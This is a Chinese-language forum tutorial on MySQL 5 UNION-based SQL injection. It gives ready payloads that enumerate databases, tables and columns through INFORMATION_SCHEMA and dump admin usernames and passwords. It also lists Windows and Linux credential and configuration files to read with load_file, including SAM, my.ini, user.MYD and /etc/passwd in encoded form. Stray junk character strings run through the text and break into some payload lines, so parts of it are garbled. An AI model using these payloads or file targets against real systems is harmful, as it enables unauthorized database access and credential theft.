mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


+ a9 d( ~  r. P& F
" X+ P4 v$ l- X- aMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
/ W1 @! v- c5 ~* Y# N明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
$ _" B/ C- |/ v, p5 g+ A( }|—字段：TABLE_NAME ->存储表的表名
% x, ]7 {2 @5 Y: b1 I1 x& z
% ?, s1 h6 y& V; d& }! W/ T: {|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

1 C: {8 W; r  C7 z" i8 v2 r|—字段：COLUMN_NAME ->该字段的名称
9 c$ P% N9 f3 }8 `1 m/ k
9 i. P5 d, a! C$ a# [6 |) r% A  F#########################################################################
##
2 b2 h& u3 J$ g2 P6 A
) l$ j. m2 z# Q0 H9 Z0 I% S0×001 获取系统信息:

" a4 C# S8 L* b3 Funion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*
2 q; w, q4 k4 Z' e; w( Q$ m
@@global.version_compile_os 获取系统版本
" Y; j' r( a6 S, i: ]
@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值

*/

######################################################################
7 J! q$ F# u, \( H) T/ O
6 y% Z# y2 M! K8 |; Y" H7 Q8 A* a9 `* C0×002 获取表名
# M( u: p( ~- T$ c$ ]* D
7 [* N2 X" |( M$ ^" L% i& P9 ~8 Bunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
( D) U9 f- b3 M  Y) Iinformation_schema.tables where table_schema=0x67617264656e /*

/*
- Y' L0 V$ {9 o3 `  j3 W6 D
0x67617264656e 为当前数据库名
$ w; T7 r" ^3 Z+ W; L) l  ~3 A4 G0 D
" s4 p. R4 {+ Y+ l6 hgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################

4 A  s3 t7 H+ S) z+ c0×003 获取字段
+ x  m+ f7 Z) l9 q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
. U8 a  t; f. P' Sinformation_schema.columns where table_name=0x61646d696e and
2 I/ _6 g. ~3 j' O& c

table_schema=0x67617264656e limit 1 /*
* p7 B) m" R: G4 D& d3 E
/*
: l. _4 O( A* C$ ~: g, k5 P
4 M4 M  z9 e7 ^: Mgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
. e% b2 {  f$ G3 f( L
- \) y6 v  p% M3 c0 P1 v! W4 v0x61646d696e ->选择一个表
8 `- T; W" S. I
0x67617264656e ->数据库名
2 u- K- a9 L6 ]2 [8 J( O
*/

. y3 f/ V& S1 b$ Z4 `. w9 M#####################################################################
. E0 G2 y' Q7 k
0×004 获取数据
: h) P8 C' D! x+ |0 E
, ?/ m/ h8 W8 E/ T0 ^union select 1,2,3
7 i7 B  S+ \' M9 `5 L,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

' ]. Z+ L# R& q) ?# X. zunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

! I% J, Y4 O" C% j, b! Q. J6 A. D1 P/*
1 {7 ]- E8 c6 n: v6 M
0x3c62723e 换行符号HEX编码
' y' E2 s( K  `& o4 Q* q
group_concat 同时获得该字段所有数据

* U( |' A1 i, C- ~) ~9 k*/
+ D$ ]( [& {* z- p4 Y, c
/ ]6 H1 U, z# l2 k1 G



顺便添加一些mysql注入时非常有用的一些东西
$ |0 K6 c4 B0 N
+ T7 E( E; A+ ?, s$ R: N, j* E% J简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
* X: r3 ~/ z+ _, G* D: y% L4:session_user()连接数据库的用户名
6 c. ]2 `  i2 C7 R, P( ?5:database()    数据库名
) O' O. u  k5 E, o6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
8 y8 c, ^8 J# Z9 S/ V& \  O9@basedir    MYSQL 安装路径
8 ^4 J5 A( H3 F5 O4 \7 v1 A; A10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
+ [2 L0 H( |4 _8 A5 a+ |) T: Oc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
% E; s4 R. K, Vc:/winnt/php.ini
c:/winnt/my.ini
; R1 _1 v4 A+ L. Q3 k# Kc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
% X, `8 V$ K2 i! E# }c:\Program Files\Serv-U\ServUDaemon.ini
1 D" l" m4 R3 p. g- h& N6 f1 O4 D) {c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
3 H6 u, w; g: Xc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
2 s1 V) \& M. q; [1 F3 C
3 s3 ?9 R+ j* D
8 A/ p, B! {- L; ic:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
, q* M+ x, @5 f' l3 c$ [. ec:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
9 h+ U. k7 Z" {, I6 q5 A' nC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
* F4 D: @+ \9 }4 Z2 H/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
( j: |7 u! f5 l% h" @" R7 ?0 w* }/usr/local/apache2/conf/httpd.conf
5 ^2 J6 c7 @" B& z2 W; R( P/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
# b( t9 P0 s2 s1 F* b4 `& Q/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
9 v3 g+ D1 f* ]" H3 j/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
" W0 v8 I. c# n: z/usr/local/app/php5/lib/php.ini //PHP相关设置
, d) P' b+ \0 ]5 F0 U2 b* L/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
2 u# R1 l. z1 k% l* k/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
2 H- e3 u8 G% a# N% A# s- h6 v/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
+ O4 S7 ~# r, x/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
) |& i( v9 M3 l& ^$ L8 B. o8 kreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
, E* b6 |7 @* t7 t上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
7 `( T' t( L. t6 R  w
+ t% D# R! u* W; T: D  b